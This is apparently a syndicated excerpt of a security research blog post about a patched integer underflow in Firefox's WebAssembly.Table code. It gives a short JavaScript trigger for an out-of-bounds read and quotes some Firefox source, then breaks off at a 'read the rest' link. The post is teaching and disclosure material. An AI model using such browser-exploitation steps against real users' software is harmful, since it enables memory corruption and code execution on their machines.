By Arthur Gerkis and David Barksdale
This series of posts makes public some old Firefox research which our Zero-Day customers had access to before it was known publicly, and then our N-Day customers after it was patched. We’ve also used this research to teach browser exploitation in our Vuln-Dev Master Class.
In this post we start with an integer underflow in part of Firefox’s WebAssembly code and use it to read and write memory in the sandboxed content process. In later posts we will then use this to execute arbitrary code in the content process, and finally escape the sandbox to the broker process and execute calc.exe.
WebAssembly.Table Integer Underflow (CVE-2018-2093)
This vulnerability was reported to Mozilla by Alex Gaynor as Bug #1415291 and fixed in Firefox 58 and 59.
The vulnerability is triggered using a WebAssembly.Table object which represents an array-like structure that stores function references and provides a bridge between WebAssembly and JavaScript. The following JavaScript code results in a memory read outside the bounds of the table.
// Creates a new WebAssembly Table object.
var wasmTable = new WebAssembly.Table({ // Provides type of the element. element: 'anyfunc', // Provides initial size of the table (length of the elements). initial: 0
}); // Tries to get the function reference at the index 0x100.
wasmTable.get(0x100);
The JavaScript constructor triggers a call to WasmTableObject::construct() shown below.
/* static */ WasmTableObject*
WasmTableObject::create(JSContext* cx, const Limits& limits)
{ RootedObject proto(cx, &cx->global()->getPrototype(JSProto_WasmTable).toOb ..
Support the originator by clicking the read the rest link below.
